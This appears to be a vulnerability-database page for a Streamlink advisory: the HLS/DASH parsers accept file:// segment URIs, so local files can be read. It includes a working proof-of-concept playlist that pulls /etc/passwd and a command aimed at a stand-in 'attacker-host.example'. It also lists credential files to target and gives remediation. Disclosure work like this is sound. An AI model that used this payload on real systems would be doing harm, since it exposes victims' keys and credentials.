Severity by source
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
Lifecycle Timeline
3Blast Radius
ecosystem impact- 26 pypi packages depend on streamlink (25 direct, 1 indirect)
Ecosystem-wide dependent count for version 8.4.0.
DescriptionGitHub Advisory
Summary
Streamlink's HLS and DASH parsers do not validate the URI scheme of segment entries and other resources. A remote .m3u8 HLS playlist or .mpd DASH manifest can list file:///path/to/file as a segment, and streamlink will read that local file and write its contents to the output stream.
Confirmed on streamlink 8.3.0 (latest release at time of report).
Description
Segment URIs from an HLS playlist or DASH manifest are passed to the worker without any scheme check. The underlying HTTP session accepts file:// URIs, which resolve against the local filesystem. There is no scheme allowlist at the parser level, so any path readable by the streamlink process is treated as a valid segment.
The attacker does not need local access to the victim. A playlist/manifest hosted on an attacker-controlled server, fetched by streamlink on the victim's machine, is enough to trigger the read.
Impact
A remote attacker hosting a malicious playlist/manifest can make any client running streamlink against that URL read arbitrary local files within the streamlink process's read scope and write them into the output file.
Reachable files depend on the user running streamlink. Typical targets: ~/.ssh/id_* private keys, ~/.aws/credentials, shell history, application config files holding API tokens, and world-readable system files like /etc/passwd.
Affected scenarios
- Server-side or automated deployments (recording bots, media pipelines, CI jobs processing playlists). The output file is often uploaded, logged, or otherwise exposed, which gives direct disclosure to attacker-reachable locations.
- Interactive desktop use. File contents land on the victim's disk and can leak through secondary channels: the user sharing the recording, cloud sync, backup, etc.
This bug does not on its own send file contents back to the attacker. The disclosure goes to the output sink. Full exfiltration depends on what happens to that file afterward.
Steps to reproduce
Tested on streamlink 8.3.0, Linux (Kali).
- Save as
playlist.m3u8:
#EXTM3U
#EXT-X-VERSION:3
#EXT-X-TARGETDURATION:5
#EXT-X-PLAYLIST-TYPE:VOD
#EXTINF:5.0,
file:///etc/passwd
#EXT-X-ENDLIST- Host the playlist on a remote server reachable by the victim. For testing, a VPS, a tunnel (cloudflared, ngrok), or a static host like GitHub Pages all work.
- On the victim machine:
streamlink "hls://https://attacker-host.example/playlist.m3u8" best -o /tmp/proof.ts- Inspect the output:
cat /tmp/proof.ts- The output contains the contents of
/etc/passwdfrom the machine running streamlink.
Local reproduction (equivalent, simpler to set up):
python3 -m http.server 8080
# in directory containing playlist.m3u8
streamlink "hls://http://127.0.0.1:8080/playlist.m3u8" best -o /tmp/proof.ts
cat /tmp/proof.tsThe remote case was confirmed independently using a tunnel.
Proposed remediation
Allowlist http and https for segment URIs in the HLS parser. Reject any other scheme (file, ftp, data, etc.) at parse time, before the URI reaches the fetcher.
The check needs to cover:
- Segment URIs in the top-level manifest.
- Segment URIs in nested manifests pulled during playback (variant playlists referenced from a master playlist).
- Other URI fields the fetcher consumes -
#EXT-X-KEYand#EXT-X-MAPURIs at minimum. Worth auditing the rest for the same issue.
The check belongs in the parser, not the fetcher. Putting it next to the untrusted input means downstream callers don't each need to re-implement it, and any future fetcher path inherits the protection by default.
AnalysisAI
Streamlink versions 8.3.0 and earlier allow arbitrary local file read via unvalidated URI schemes in HLS and DASH parsers. A remote attacker hosting a malicious .m3u8 or .mpd manifest can trick streamlink clients into reading local files (such as SSH keys, AWS credentials, or /etc/passwd) and writing their contents to the output stream. Requires user interaction (clicking/running streamlink against attacker-controlled playlist), but no authentication needed. CVSS 6.5 reflects the information disclosure risk; affected deployments with automated processing or cloud sync pose material exfiltration risk.
Technical ContextAI
Streamlink is a command-line media player utility that resolves HLS (HTTP Live Streaming, RFC 8216) and DASH (Dynamic Adaptive Streaming over HTTP, ISO/IEC 23009-1) manifests to fetch video segments. The parsers extract segment URIs from .m3u8 and .mpd files and pass them to an HTTP session fetcher without scheme validation. The underlying HTTP session incorrectly accepts file:// URIs (defined in RFC 8089), which resolve against the local filesystem rather than requiring HTTP(S) transport. CWE-73 (External Control of File Name or Path) applies: untrusted remote input (manifest entries) directly controls which local files are opened. The root cause is absence of a scheme allowlist at parse time; segment URIs, key URIs (#EXT-X-KEY), and media initialization URIs (#EXT-X-MAP) are all vulnerable.
RemediationAI
Upgrade to Streamlink 8.4.0 or later immediately. The patch implements URI scheme allowlisting at the HLS and DASH parser level, rejecting any segment, key, or media initialization URIs with schemes other than http or https before they reach the fetcher. For users unable to upgrade immediately, restrict streamlink to processing only trusted playlists/manifests (internal CDN sources, organization-controlled servers) and avoid running streamlink against user-supplied or attacker-controlled manifest URLs. Implement network egress controls to block file:// URI access at the OS/container level (e.g., seccomp rules denying local file access, AppArmor confinement), though this is a workaround and not a substitute for patching. See https://github.com/streamlink/streamlink/security/advisories/GHSA-hgqw-6m45-hw5f for patch details and timeline.
Same weakness CWE-73 – External Control of File Name or Path
View allSame technique Information Disclosure
View allVendor StatusVendor
SUSE
| Product | Status |
|---|---|
| openSUSE Tumbleweed | Fixed |
Share
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-32559
GHSA-hgqw-6m45-hw5f